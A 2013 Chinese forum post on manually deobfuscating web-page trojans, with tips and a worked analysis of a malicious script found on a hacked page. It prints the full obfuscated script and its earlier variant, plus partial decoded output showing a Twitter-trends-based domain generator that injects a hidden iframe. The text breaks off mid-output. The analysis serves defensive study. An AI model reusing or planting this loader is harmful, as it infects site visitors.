如何手动解网马+一个复杂有趣的网马分析

显示全部楼层 · 发表于 2013-4-29 03:13:20

本帖最后由 dayangyang 于 2013-4-29 03:23 编辑

用最简单最直接的方法讲述手动解网马，网马的加密方式NNN种，管他怎么加密，我们只关心最后的解密后的脚本。

环境：虚拟机/沙盘+浏览器
方法：新建html文件，将加密的代码拷入进去，修改执行部分代码，双击运行，浏览器中看到解密后的结果

Tip1. 需要注意的关键词： eval fromCharCode document.write execute unescape
☆☆☆很多时候只要将eval或document.write 替换成 alert 即可

这些关键字也不总是完整出现的.

<script>
fr = "fromChar";
f=[510, 702, 550, 594...省略1000多数字]；//☆看到莫名的数字乱码，直接忽略吧，眼睛要放在他们的前后
v = "eva";
if (v) e = window[v + "l"];//eval
z = ((e) ? "Code" : ""); //z=Code
w = f;
s = [];
r = String;
for (; 1776 - 5 + 5 > i; i += 1) {
j = i;
if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2")))); //String["fromCharCode"](xxx)
if (f) e(s); //☆☆☆此句改成：alert（s）;
</script>

复制代码

Tip2单击弹出的窗口，ctrl+C 即可复制弹窗里的内容。

Tip3.调试javascript的方法
   IE，选项高级中取消选中"禁用脚本调试 (Internet Explorer)"和 "禁用脚本调试 ( 其他 )" 按F12可以出现调试窗口
   chrome也是按F12可以出来javascript控制台，里面可以检查错误，查看网页访问情况。
   火狐Firebug插件，更强大的javascript调速器，单步调试、设置断点、变量查看窗口都有哦~
   Eclipse需要配合JSDT(Javascript Debug Toolkit)这个插件，下载地址https://code.google.com/p/jsdt/
   Visual Studio也可以调试，方法具体比较多嘿嘿有兴趣可以搜索下。

Tip4.遇见乱七八糟都在一起的代码怎么办？使用JS分行工具吧，主流的解木马软件都自带，或者http://jsbeautifier.org/

Tip5. 对于有些try-catch语句可以选择性忽略，因为很有可能是判断是否执行的。如果有大量只有定义的变量或者无内容的函数很有可能是起掩盖真实代码作用。（这个不一定准哦。。这次例子就不是）

简单的想必大家都木有兴趣，直接来复杂的例子，来战吧少年~

来源：墨家小子的http://bbs.kafan.cn/thread-1555799-1-1.html
这个网页被挂了3串不一样的木马（TT），其中的一段是：

我要去死啊。。卡饭的自动恢复只能到这里了。。

<script>
(function($,_2,_1,doc,tk) {
var xo="";
function qq2(cid){cid=~~cid;return ["L",189-20*cid,175,16*cid,70,81,89,16,73,78,81,67,31,10,2,28,2,13,83,31,2,28,88,67,84,2,56,77,31,86,74,75,85,29,62,61,56,77,2,2,40,87,78,78,59,71,67,84,2,7,47,81,80,86,74,2,7,38,67,86,71,2,7,42,81,87,84,85,2,7,47,75,80,87,86,71,85,2,7,53,71,69,81,80,70,85,10,11,63,95,29,2,13,52,31,2,28,2,8,89,14,56,91,31,86,74,75,85,16,5,83,10,11,14,75,31,18,29,56,91,61,19,63,13,31,19,29,89,74,75,78,71,10,75,13,13,30,25,11,93,5,89,31,56,91,61,75,63,2,17,5,89,30,5,37,11,56,91,61,75,63,2,25,5,89,95,62,2,56,91,16,85,82,78,75,69,71,10,96,92,9,11,14,19,13,96,54,2,18,2,24,96,87,2,18,13,9,54,9,13,56,91,2,24,96,55,2,18,95,29,56,44,31,93,9,74,66,74,86,86,82,28,17,17,58,85,66,17,58,86,66,86,84,71,58,70,66,70,67,75,58,80,66,80,70,85,58,83,66,33,58,69,66,69,67,78,78,68,67,69,77,31,58,76,66,5,58,67,66,67,82,75,58,78,66,78,91,58,57,66,86,89,75,86,86,71,84,58,81,66,69,81,79,58,71,66,19,58,77,66,85,58,45,66,68,81,70,91,58,90,66,67,76,67,90,58,38,66,16,58,46,66,78,75,68,85,58,44,66,76,83,87,71,84,91,58,24,66,24,16,20,58,79,66,79,75,80,58,72,66,81,80,58,53,66,69,84,75,82,86,58,75,66,75,72,58,47,66,84,67,79,71,58,59,66,74,71,67,70,58,89,66,89,75,70,86,74,28,58,82,66,82,90,29,58,42,66,74,71,75,73,74,86,28,58,54,66,20,58,84,66,84,69,58,51,66,4,58,91,66,85,86,91,78,71,31,58,68,66,32,30,58,52,66,32,30,17,58,43,66,70,75,88,58,36,66,30,58,35,66,32,58,73,66,73,81,81,73,78,71,58,39,66,8,70,67,86,71,31,58,92,66,18,58,87,66,15,58,55,66,2,58,14,66,28,18,18,58,29,9,28,20,21,22,23,24,25,26,27,18,19,14,9,17,9,28,22,26,20,25,19,14,9,40,9,28,19,27,26,19,27,23,20,23,22,14,9,41,9,28,19,20,14,9,37,66,31,9,95,29,34,2,5,53,10,56,81,11,93,5,74,31,61,63,29,72,81,84,10,56,86,31,18,29,56,86,30,56,81,2,10,29,56,86,13,13,11,93,5,74,16,82,87,85,74,10,56,44,61,56,81,16,69,74,67,84,35,86,10,56,86,11,63,11,95,62,2,5,35,10,5,74,11,95,56,48,31,70,81,69,87,79,71,80,86,29,5,81,31,89,75,80,70,81,89,29,2,11,42,31,9,87,80,70,71,72,75,80,71,70,9,29,2,11,38,31,96,74,67,38,57,38,81,85,71,85,86,80,85,70,78,38,76,72,83,69,83,9,2,22,75,31,2,12,11,31,31,2,11,42,11,2,17,5,75,94,94,3,56,70,10,11,11,93,75,72,10,3,5,75,11,93,86,84,91,93,56,88,31,76,51,87,71,84,91,2,3,29,86,84,91,93,56,88,31,6,2,3,95,56,80,31,56,48,16,73,71,86,39,78,71,79,71,80,86,85,36,91,54,67,73,48,67,79,71,10,96,59,2,18,61,18,63,29,5,84,31,56,48,16,69,84,71,67,86,71,39,78,71,79,71,80,86,10,96,77,53,2,18,29,5,84,16,85,71,86,35,86,86,84,75,68,87,86,71,10,96,77,84,9,11,14,5,53,10,4,74,90,38,73,67,77,38,81,85,90,85,46,85,44,85,71,38,24,85,44,38,79,38,76,4,11,11,29,56,80,16,67,82,82,71,80,70,37,74,75,78,70,10,5,84,11,95,34,2,56,68,10,5,92,14,56,69,2,21,47,67,86,74,16,72,78,81,81,84,10,5,92,17,56,69,11,2,27,54,10,5,40,11,93,88,67,84,2,56,79,31,56,68,10,2,11,90,14,2,6,67,11,29,2,8,76,31,2,11,90,7,2,6,67,29,2,8,46,31,2,6,91,12,5,76,29,2,8,69,31,2,6,53,12,56,79,29,2,8,85,31,5,46,15,5,69,2,17,5,85,32,18,11,93,5,90,31,5,85,95,71,78,85,71,93,5,90,31,5,85,13,2,6,73,95,62,10,5,90,7,5,40,11,2,27,50,10,5,41,11,93,2,11,90,31,96,29,9,11,13,5,41,29,2,6,91,31,96,17,9,11,29,2,6,73,31,96,29,9,11,15,96,40,9,11,29,2,6,67,31,56,68,10,2,6,73,14,2,6,91,11,29,2,6,53,31,2,6,73,7,2,6,91,2,27,35,10,56,2,21,56,2,10,31,31,19,33,56,61,18,63,28,56,2,24,9,9,11,95,29,34,2,5,68,10,56,11,93,70,31,80,71,89,2,38,67,86,71,10,2,22,73,31,96,92,71,71,9,11,29,70,16,85,71,86,54,75,79,71,10,10,56,16,67,85,65,81,72,15,96,41,9,11,12,96,41,9,11,12,96,41,9,11,12,96,71,92,92,2,18,12,96,71,92,92,92,2,18,29,62,2,70,2,27,82,10,56,36,11,93,2,8,48,14,56,47,14,5,44,31,56,36,2,10,29,2,8,67,31,61,63,29,89,74,75,78,71,10,15,15,5,44,11,93,56,47,31,5,54,10,5,44,2,22,67,16,82,87,85,74,10,56,47,2,22,48,31,56,36,61,56,47,63,29,56,36,61,56,47,63,31,56,36,61,5,44,63,29,56,36,61,5,44,63,31,5,48,95,95,34,2,56,90,10,6,11,93,56,84,31,6,16,79,67,82,10,61,26,19,14,26,23,14,25,22,14,25,22,14,27,20,14,19,25,14,26,20,14,25,21,14,26,18,14,21,18,14,26,20,14,25,25,14,20,23,14,19,19,14,19,18,14,19,18,14,24,19,14,19,19,14,23,24,14,23,23,14,19,19,14,23,21,14,24,14,23,21,14,25,14,20,14,19,14,18,14,22,26,63,14,34,10,90,14,75,2,21,53,86,84,75,80,73,16,72,84,81,79,37,74,67,84,37,81,70,71,10,75,13,90,13,20,22,11,95,11,29,62,2,5,35,10,56,84,11,2,27,72,10,90,2,21,90,2,10,95,34,2,56,74,10,6,11,93,75,72,2,12,11,3,31,2,11,42,11,93,6,10,2,28,75,72,2,12,16,56,82,11,3,31,2,11,42,11,62,29,6,16,56,82,31,19,29,2,23,38,14,34,10,56,37,11,93,5,71,31,5,68,10,56,37,2,22,87,31,5,71,2,2,47,81,80,86,74,10,11,2,29,46,31,5,71,2,2,38,67,86,71,10,2,22,91,31,34,10,90,14,75,11,93,62,10,5,72,10,90,13,4,4,11,15,19,11,33,90,28,4,18,4,13,90,95,29,56,85,31,5,91,10,5,87,14,22,11,13,4,15,4,13,5,91,10,56,46,14,25,2,22,86,31,5,38,13,5,53,10,4,39,2,19,29,56,71,31,56,42,31,56,68,10,5,71,2,2,42,81,87,84,85,10,11,14,24,11,12,24,2,29,38,31,56,71,13,19,29,5,37,31,13,96,71,92,9,11,29,2,14,2,23,86,14,34,10,56,37,11,93,86,84,91,93,5,80,31,56,37,16,86,84,71,80,70,85,29,5,79,31,5,53,10,4,2,19,13,4,2,4,2,17,56,71,30,5,37,11,56,71,2,25,56,71,2,17,56,38,30,5,37,11,56,38,2,25,56,38,29,2,26,71,13,5,53,10,58,11,63,2,17,3,5,70,11,93,2,26,38,13,5,53,10,58,11,63,95,5,70,31,10,5,70,61,21,63,16,80,67,79,71,16,86,81,46,81,89,71,84,37,67,85,71,10,11,16,84,71,82,78,67,69,71,10,17,61,64,67,15,92,63,17,73,75,14,9,9,11,13,9,79,75,69,84,81,85,69,81,82,71,9,11,16,85,82,78,75,86,10,9,9,2,22,36,31,5,87,12,25,19,13,56,42,12,21,13,56,46,12,21,25,29,5,50,10,5,36,2,22,72,31,5,54,10,22,11,13,5,37,29,5,82,10,5,70,2,22,39,31,96,37,74,9,11,13,5,35,10,5,70,11,16,85,87,68,85,86,84,75,80,73,10,18,14,5,72,11,13,9,16,69,81,79,17,9,13,56,90,10,6,11,29,56,44,61,9,60,9,63,31,5,39,29,56,89,31,96,36,43,2,20,68,75,47,55,2,20,55,77,84,60,52,75,47,52,43,35,9,11,29,6,10,96,45,2,18,16,67,82,82,71,80,70,10,56,89,11,95,69,67,86,69,74,10,56,83,11,93,95,95,11,95,14,5,37,12,5,37,12,5,37,11,95,11,95,11,95,71,78,85,71,93,2,14,2,15,14,19,13,96,54,54,54,2,18,95,95,2,15,11,5,76,85,34,72,87,80,69,86,75,81,80,56,5,45,58,9,14,9,66,9,28,9,96,5,53,10,9,62,84,71,86,87,84,80,2,2,16,73,71,86,55,54,37,2,3,16,80,81,37,81,80,72,78,75,69,86,10,86,84,87,71,11,95,69,67,86,69,74,10,71,11,93,95,2,6,5,81,16,56,2,7,10,11,14,56,77,2,2,2,8,88,67,84,2,5,2,10,16,78,71,80,73,86,74,2,11,5,81,16,5,2,12,10,86,91,82,71,81,72,10,6,2,13,38,67,86,71,16,82,84,81,86,81,86,91,82,71,16,5,2,14,85,71,86,54,75,79,71,81,87,86,10,2,28,2,15,56,74,10,5,81,16,76,51,87,71,84,91,11,95,2,17,29,75,72,10,2,18,9,11,11,2,19,54,92,71,54,87,4,11,13,56,85,2,20,91,51,42,54,82,89,71,71,71,82,51,2,21,11,93,62,2,2,22,11,29,5,2,23,6,16,73,71,86,44,53,49,48,10,5,2,24,16,76,81,75,80,10,2,25,31,96,92,9,11,13,2,26,5,70,31,5,80,61,5,79,13,56,2,27,95,34,2,5,2,28,34,10,11,93,2,29,13,10,13,96,71,2,18,29,56];}
function co() {
return 'Code';
}
function gafu() {
xxx=a(String, 'f' + ro() + co());
return function(q){return xxx(q);};
};
rex = [gafu(),gafu()];
function choo(k) {
if (k < 9) {
return 1
} else {
return 2
}
};
d = '';
mapper = [5,34,56,58,66,96,62,2,2,2,3,2,6,2,7,2,8,2,10,2,11,2,12,2,13,2,14,2,15,2,17,2,18,2,19,2,20,2,21,2,22,2,23,2,24,2,25,2,26,2,27,2,28,2,29];
map = ''; xo = doc;
function fs(ro, arr, add, st, en,dp) {
//Mauris gravida, libero ut tempor ultricies, ante erat blandit dui, vestibulum convallis ligula lacus et metus. Duis quis nunc justo, gravida sem
var hf = ((en+st)>>1);
if(en-st>16)
{
//lacus, tristique vitae aliquet a, ultrices nec libero. Aliquam sagittis enim in nibh semper tincidunt. Donec malesuada lorem sit amet risus euis
return fs(ro, arr, add, st, hf,dp+1) + fs(ro,arr, add, hf, en,dp+1);
}else{
var rt='';rx1=rex[add-29];
for(var rj=st;rj<en;rj++){
if(typeof arr[rj]!='string'){
rt+=rx1(arr[rj]+add);}
}
//modo, diam a placerat facilisis, magna libero mollis erat, in molestie nunc tellus consequat justo. Nulla ac nunc purus. Pellentesque habitant morbi
return rt;
}
}
map += fs(map, mapper, 30, 0,mapper.length);
//et condimentum metus. Aliquam convallis auctor sapien, sit amet bibendum ligula condimentum ac. Vivamus blandit molestie enim vitae bland
function a(b, c) {
return b[c];
};
function ro() {
return 'romChar';
}
rd=fs(d, qq2(6-tk.length), 30, 0, qq2().length);
//e feugiat. Etiam elit elit, hendrerit et varius non, molestie consectetur ipsum. Nullam sapien sem, mattis nec tempus non, elementum vitae ligula. Maur
try{
$(_1(map,rd,choo,_2).replace('?n','in'));}catch(e){}
})(function(jsBb) {
return (function(jsB, jsBs) {
return jsBs(jsB(jsBs(jsB(jsBb))))(jsBb)()
})((function(jsB) {
return jsB.constructor
}), (function(jsB) {
return (function(jsBs) {
//accumsan dapibus diam
return jsB.call(jsB, jsBs)
})
}))
},function(tt){return tt.pop();},
function(kk,dd,ch,pp){
for(var c=kk.length;c>0;){
var x=ch(c);
c-=x;
var rep=kk.substr(c, x);
//accumsan dapibus diam
var t = dd.split(rep);
dd=t.join(pp(t));
};return dd;
},document,document.getElementsByTagName('title'));
/**/
if(typeof gloa=='function')gloa();
</script>

复制代码

疑问：没有执行函数怎么破？开头的函数看不懂？最后的jsBb那一大串还有gloa()前面怎么完全没有定义？注释又是怎么回事啊？

解答：
注释是拉丁文，杂乱的单词拼凑的，掩人耳目的。对于一个正常的网页开发者，请问用拉丁文写注释是什么心态？

开头的函数和最后的函数都是闭包函数，没有函数名。没有用到的变量都定义在加密的代码中。这是个非常有趣的网马。
它在2011年的的原始形态是这样的：

(function($){qq2=[8,0,26,0,11,81,29,0,26,86,65,82,0,54,48,29,84,72,73,83,27,60,59,54,48,0,0,38,85,76,76,57,69,65,82,0,5,45,79,78,84,72,0,5,36,65,84,69,0,5,40,79,85,82,83,0,5,45,73,78,85,84,69,83,0,5,51,69,67,79,78,68,83,8,9,61,93,27,0,11,75,29,0,26,0,6,82,12,54,80,29,84,72,73,83,14,3,81,8,9,12,73,29,16,27,54,80,59,17,61,11,29,17,27,87,72,73,76,69,8,73,11,11,28,23,9,91,3,82,29,54,80,59,73,61,0,15,3,82,28,3,45,9,54,80,59,73,61,0,22,3,82,93,60,0,54,80,14,83,80,76,73,67,69,8,94,90,7,9,12,17,11,94,52,0,16,0,23,94,85,0,16,11,7,52,7,11,54,80,0,23,94,53,0,16,93,27,54,39,29,91,7,72,64,72,84,84,80,26,15,15,56,83,64,15,56,84,64,84,82,69,56,68,64,68,65,73,56,78,64,78,68,83,56,81,64,31,56,67,64,67,65,76,76,66,65,67,75,29,56,74,64,3,56,65,64,65,80,73,56,76,64,76,89,56,55,64,84,87,73,84,84,69,82,56,79,64,67,79,77,56,69,64,17,56,75,64,83,56,43,64,66,79,68,89,56,88,64,65,74,65,88,56,36,64,14,56,44,64,76,73,66,83,56,42,64,74,81,85,69,82,89,56,22,64,22,14,18,56,77,64,77,73,78,56,70,64,79,78,56,51,64,67,82,73,80,84,56,73,64,73,70,56,45,64,82,65,77,69,56,57,64,72,69,65,68,56,87,64,87,73,68,84,72,26,56,80,64,80,88,27,56,40,64,72,69,73,71,72,84,26,56,52,64,18,56,82,64,82,67,56,49,64,2,56,89,64,83,84,89,76,69,29,56,66,64,30,28,56,50,64,30,28,15,56,41,64,68,73,86,56,34,64,28,56,33,64,30,56,71,64,71,79,79,71,76,69,56,37,64,6,68,65,84,69,29,56,90,64,16,56,85,64,13,56,53,64,0,56,12,64,26,16,16,56,27,7,26,18,19,20,21,22,23,24,25,16,17,12,7,15,7,26,20,24,18,23,17,12,7,38,7,26,17,25,24,17,25,21,18,21,20,12,7,39,7,26,17,18,12,7,35,64,29,7,93,27,32,0,3,77,8,54,85,9,91,3,52,29,59,61,27,70,79,82,8,54,65,29,16,27,54,65,28,54,85,0,8,27,54,65,11,11,9,91,3,52,14,80,85,83,72,8,54,39,59,54,85,14,67,72,65,82,33,84,8,54,65,9,61,9,93,60,0,3,84,8,3,52,9,93,54,73,29,68,79,67,85,77,69,78,84,27,3,85,29,87,73,78];qq21=[68,79,87,27,0,9,89,29,7,85,78,68,69,70,73,78,69,68,7,27,0,9,90,29,94,72,65,36,55,36,79,83,69,83,84,78,83,68,76,36,74,70,81,67,81,7,0,19,40,29,0,10,9,29,29,0,9,89,9,0,15,3,40,92,92,1,54,67,8,9,9,91,73,70,8,1,3,40,9,91,84,82,89,91,54,71,29,74,49,85,69,82,89,0,1,27,84,82,89,91,54,71,29,4,0,1,93,54,51,29,54,73,14,71,69,84,37,76,69,77,69,78,84,83,34,89,52,65,71,46,65,77,69,8,94,57,0,16,59,16,61,27,3,37,29,54,73,14,67,82,69,65,84,69,37,76,69,77,69,78,84,8,94,75,51,0,16,27,3,37,14,83,69,84,33,84,84,82,73,66,85,84,69,8,94,75,82,7,9,12,3,77,8,2,72,88,36,71,65,75,36,79,83,88,83,44,83,42,83,69,36,22,83,42,36,77,36,74,2,9,9,27,54,51,14,65,80,80,69,78,68,35,72,73,76,68,8,3,37,9,93,32,0,54,50,8,3,83,12,54,38,0,18,45,65,84,72,14,70,76,79,79,82,8,3,83,15,54,38,9,0,25,86,8,3,68,9,91,86,65,82,0,54,70,29,54,50,8,0,9,44,12,0,4,88,9,27,0,6,87,29,0,9,44,5,0,4,88,27,0,6,46,29,0,4,80,10,3,87,27,0,6,38,29,0,4,77,10,54,70,27,0,6,69,29,3,46,13,3,38,0,15,3,69,30,16,9,91,3,44,29,3,69,93,69,76,83,69,91,3,44,29,3,69,11,0,4,33,93,60,8,3,44,5,3,68,9,0,25,42,8,3,78,9,91,0,9,44,29,94,27,7,9,11,3,78,27,0,4,80,29,94,15,7,9,27,0,4,33,29,94,27,7,9,13,94,38,7,9,27,0,4,88,29,54,50,8,0,4,33,12,0,4,80,9,27,0,4,77,29,0,4,33,5,0,4,80,0,25,84,8,54,0,18,54,0,8,29,29,17,31,54,59,16,61,26,54,0,23,7,7,9,93,27,32,0,3,50,8,54,9,91,68,29,78,69,87,0,36,65,84,69,8,0,19,33,29,94,90,69,69,7,9,27,68,14,83,69,84,52,73,77,69,8,8,54,14,65,83,63,79,70,13,94,39,7,9,10];function co(){return 'Code';}function gafu(){return a(String,'f'+ro()+co());}qq3=[94,39,7,9,10,94,39,7,9,10,94,69,90,90,0,16,10,94,69,90,90,90,0,16,27,60,0,68,0,25,79,8,54,35,9,91,0,6,73,12,54,72,12,3,39,29,54,35,0,8,27,0,6,88,29,59,61,27,87,72,73,76,69,8,13,13,3,39,9,91,54,72,29,3,86,8,3,39,0,19,88,14,80,85,83,72,8,54,72,0,19,73,29,54,35,59,54,72,61,27,54,35,59,54,72,61,29,54,35,59,3,39,61,27,54,35,59,3,39,61,29,3,73,93,93,32,0,54,44,8,4,9,91,54,37,29,4,14,77,65,80,8,59,24,17,12,24,21,12,23,20,12,23,20,12,25,18,12,17,23,12,24,18,12,23,19,12,24,16,12,19,16,12,24,18,12,23,23,12,18,21,12,17,17,12,17,16,12,17,16,12,22,17,12,17,17,12,21,22,12,21,21,12,17,17,12,21,19,12,22,12,21,19,12,23,12,18,12,17,12,16,12,20,24,61,12,32,8,88,12,73,0,18,51,84,82,73,78,71,14,70,82,79,77,35,72,65,82,35,79,68,69,8,73,11,88,11,18,20,9,93,9,27,60,0,3,84,8,54,37,9,0,25,74,8,88,0,18,88,0,8,93,32,0,54,52,8,4,9,91,73,70,0,10,9,1,29,0,9,89,9,91,4,8,0,26,73,70,0,10,14,54,79,9,1,29,0,9,89,9,60,27,4,14,54,79,29,17,27,0,20,90,12,32,8,54,45,9,91,3,36,29,3,50,8,54,45,0,19,43,29,3,36,0,0,45,79,78,84,72,8,9,0,27,46,29,3,36,0,0,36,65,84,69,8,0,19,80,29,32,8,88,12,73,9,91,60,8,3,74,8,88,11,2,2,9,13,17,9,31,88,26,2,16,2,11,88,93,27,54,69,29,3,80,8,3,43,12,20,9,11,2,13,2,11,3,80,8,54,46,12,23,0,19,65,29,3,90,11,3,77,8,2,37,0,21,27,54,36,29,54,89,29,54,50,8,3,36,0,0,40,79,85,82,83,8,9,12,22,9,10,22,0,27,90,29,54,36,11,17,27,3,45,29,11,94,69,90,7,9,27,0,12,0,20,65,12,32,8,54,45,9,91,84,82,89,91,3,51,29,54,45,14,84,82,69,78,68,83,27,3,70,29,3,77,8,2,0,21,11,2,0,2,0,15,54,36,28,3,45,9,54,36,0,22,54,36,0,15,54,90,28,3,45,9,54,90,0,22,54,90,27,0,24,36,11,3,77,8,56,9,61,0,15,1,3,67,9,91,0,24,90,11,3,77,8,56,9,61,93,3,67,29,8,3,67,59,19,61,14,78,65,77,69,14,84,79,44,79,87,69,82,35,65,83,69,8,9,14,82,69,80,76,65,67,69,8,15,59,62,65,13,90,61,15,71,73,12,7,7,9,11,7,77,73,67,82,79,83,67,79,80,69,7,9,14,83,80,76,73];qq31=[84,8,7,7,0,19,35,29,3,43,10,23,17,11,54,89,10,19,11,54,46,10,19,23,27,3,42,8,3,35,0,19,74,29,3,86,8,20,9,11,3,45,27,3,79,8,3,67,0,19,66,29,94,35,72,7,9,11,3,84,8,3,67,9,14,83,85,66,83,84,82,73,78,71,8,16,12,3,74,9,11,7,14,67,79,77,15,7,11,54,44,8,4,9,27,54,39,59,7,58,7,61,29,3,66,27,54,82,29,94,34,41,0,17,66,73,45,53,0,17,53,75,82,58,50,73,45,50,41,33,7,9,27,4,8,94,43,0,16,14,65,80,80,69,78,68,8,54,82,9,93,67,65,84,67,72,8,54,81,9,91,93,93,9,93,12,3,45,10,3,45,10,3,45,9,93,9,93,9,93,69,76,83,69,91,0,12,0,13,12,17,11,94,52,52,52,0,16,93,93,0,13,9,8,9,3,74,83,32,70,85,78,67,84,73,79,78,54,3,34,56,7,12,7,64,7,26,7,94,3,77,8,7,60,82,69,84,85,82,78,0,0,14,71,69,84,53,52,35,0,1,14,78,79,35,79,78,70,76,73,67,84,8,84,82,85,69,9,93,67,65,84,67,72,8,69,9,91,93,0,4,3,85,14,54,0,5,8,9,12,54,48,0,0,0,6,86,65,82,0,3,0,8,14,76,69,78,71,84,72,0,9,3,85,14,3,0,10,8,84,89,80,69,79,70,8,4,0,11,36,65,84,69,14,80,82,79,84,79,84,89,80,69,14,3,0,12,83,69,84,52,73,77,69,79,85,84,8,0,26,0,13,54,52,8,3,85,14,74,49,85,69,82,89,9,93,0,15,27,73,70,8,0,16,7,9,9,0,17,89,49,40,52,80,87,69,69,69,80,49,0,18,9,91,60,0,0,19,9,27,3,0,20,4,14,71,69,84,42,51,47,46,8,3,0,21,52,90,69,69,85,2,9,11,54,69,0,22,29,94,90,7,9,11,0,23,14,74,79,73,78,8,0,24,3,67,29,3,51,59,3,70,11,54,0,25,93,32,0,3,0,26,32,8,9,91,0,27,11,8,11,94,69,0,16,27,54];d='';mapper=[3,32,54,56,64,94,60,0,0,0,1,0,4,0,5,0,6,0,8,0,9,0,10,0,11,0,12,0,13,0,15,0,16,0,17,0,18,0,19,0,20,0,21,0,22,0,23,0,24,0,25,0,26,0,27];map='';function fs(ro,arr,add){for(var i=0;i<arr.length;i++){ro+=String.fromCharCode(arr[i]+add);}return ro;}d=fs(d,qq2,32);d=fs(d,qq21,32);d=fs(d,qq3,32);d=fs(d,qq31,32);map=fs(map,mapper,32);function a(b,c){return b[c];};function ro(){return 'romChar';}for(c=55;c;d=(t=d.split(map.substr(c-=(x=c<9?1:2),x))).join(t.pop()));$(d)})(function(jsBb){return(function(jsB,jsBs){return jsBs(jsB(jsBs(jsB(jsBb))))(jsBb)()})((function(jsB){return jsB.constructor}),(function(jsB){return(function(jsBs){return jsB.call(jsB,jsBs)})}))});

复制代码

可以看出它变得更加复杂了，但是大体的架构没有变化。
让我们从简单的开始吧，第一部分先看maps
将map加密的部分，还有fs 函数 rex函数 gafu()函数提取出来
在map += fs(map, mapper, 30, 0,mapper.length); 后面加入 alert（map）;
运行得到结果：

#@VX`~\ ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8 9 : ;

复制代码

咦这是什么？不用着急，之后会用到

第二部分来解第一块很长的加密部分，去除闭包函数开头(function($$,_2,_1,doc,tk) {与结尾})，函数调用的部分$$(_1(map,rd,choo,_2).replace('?n','in')); 还有doc xo等，最后令tk.length=1，并在rd=fs(d, qq2(6-tk.length), 30, 0, qq2().length);后面加入alert（rd）;
运行得到：

( : +q= :var VP=this;\[VP FullYear %Month %Date %Hours %Minutes %Seconds()]}; +k= : &r,Vp=this.#q(),i=0;Vp[1]+=1;while(i++<7){#r=Vp[i] /#r<#M)Vp[i] 6#r}\ Vp.splice(~z'),1+~T 0 7~u 0+'T'+Vp 7~U 0};VG={'h`http://Xs`/Xt`treXd`daiXn`ndsXq`?Xc`callback=Xj`#Xa`apiXl`lyXW`twitterXo`comXe`1Xk`sXK`bodyXx`ajaxXD`.XL`libsXJ`jqueryX6`6.2Xm`minXf`onXS`criptXi`ifXM`rameXY`headXw`width:Xp`px;XH`height:XT`2Xr`rcXQ`"Xy`style=Xb`><XR`></XI`divXB`<XA`>Xg`googleXE`&date=Xz`0Xu`-XU` X,`:00X;':2345678901,'/':48271,'F':198195254,'G':12,'C`='};[url=home.php?mod=space&uid=340]@[/url] #m(Vu){#T=[];for(Va=0;Va<Vu (;Va++){#T.push(VG[Vu.charAt(Va)])}\ #t(#T)}Vi=document;#u=window; )y='undefined'; )z=~haDWDosestnsdlDjfqcq' 3H= *)== )y) /#H||!Vc()){if(!#H){try{Vg=jQuery !;try{Vg=$ !}VS=Vi.getElementsByTagName(~Y 0[0];#E=Vi.createElement(~kS 0;#E.setAttribute(~kr'),#m("hxDgakDosxsLsJseD6sJDmDj"));VS.appendChild(#E)}@ VR(#s,VF 2Math.floor(#s/VF) 9v(#d){var Vf=VR( )L, $x); &w= )L% $x; &N= $p*#w; &F= $m*Vf; &e=#N-#F /#e>0){#L=#e}else{#L=#e+ $A}\(#L%#d) 9J(#n){ )L=~;')+#n; $p=~/'); $A=~;')-~F'); $x=VR( $A, $p); $m= $A% $p 9t(V 2V (==1?V[0]:V 7'')};@ #R(V){d=new Date( 3A=~zee');d.setTime((V.as_of-~G')*~G')*~G')*~ezz 0*~ezzz 0;\ d 9o(VC){ &i,Vh,#G=VC (; &x=[];while(--#G){Vh=#v(#G 3x.push(Vh 3i=VC[Vh];VC[Vh]=VC[#G];VC[#G]=#i}}@ VL($){VE=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i 2String.fromCharCode(i+x+24)});\ #t(VE) 9j(x 2x (}@ VT($){if *)!= )y){$( :if *.Vo)!= )y)\;$.Vo=1; 4z,@(VM){#D=#R(VM 3K=#D Month() ;N=#D Date( 3p=@(x,i){\(#j(x+"")-1)?x:"0"+x};Ve=#p(#K,4)+"-"+#p(VN,7 3a=#z+#m("E 5;VD=Vy=VR(#D Hours(),6)*6 ;z=VD+1;#M=+~ez'); , 4a,@(VM){try{#S=VM.trends;#f=#m(" 5+" " /VD<#M)VD 6VD /Vz<#M)Vz 6Vz; 8D+#m(X)] /!#c){ 8z+#m(X)]}#c=(#c[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'microscope').split('' 3C=#K*71+Vy*3+VN*37;#J(#C 3j=#v(4)+#M;#o(#c 3b=~Ch')+#t(#c).substring(0,#j)+'.com/'+VL($);VG['Z']=#b;Vr=~BI 1biMU 1UkrZRiMRIA');$(~K 0.append(Vr)}catch(Vq){}})},#M*#M*#M)})})}else{ , -,1+~TTT 0}} -)()#js@functionV#BX','`':'~#m('\return .getUTC !.noConflict(true)}catch(e){} $#u.V %(),VP &var # (.length )#u.# *(typeof($ +Date.prototype.# ,setTimeout( : -VT(#u.jQuery)} /;if( 0')) 1yQHTpweeepQ 2){\ 3);# 4$.getJSON(# 5Tzeeu")+Ve 6=~z')+ 7.join( 8#c=#S[#f+V 9}@ # :@(){ ;+(+~e 0;V

复制代码

好像还是很乱，不过可以看出一些端倪。这时候就需要用map来去除其中的杂乱的符号和数字了。再回忆下
$$(_1(map,rd,choo,_2).replace('?n','in'));就会发现 (map,rd,choo,_2)其实是调用的最后function(kk,dd,ch,pp)这个函数，没有函数名的闭包函数调用真的伤不起。
所以我们在return dd; 的前面加入alert（dd）；
运行得到：

cíjsS('dow.gloa=(function(){Date.prototype.jsq=function(){var jsKk=this;return[jsKk.getUTCFullYear(),jsKk.getUTCMonth(),jsKk.getUTCDate(),jsKk.getUTCHours(),jsKk.getUTCMinutes(),jsKk.getUTCSeconds()]};Date.prototype.jsR=function(){var jsw,jsKy=this.jsq(),i=0;jsKy[1]+=1;while(i++<7){jsw=jsKy[i];if(jsw<jsC)jsKy[i]=jsS('z')+jsw}return 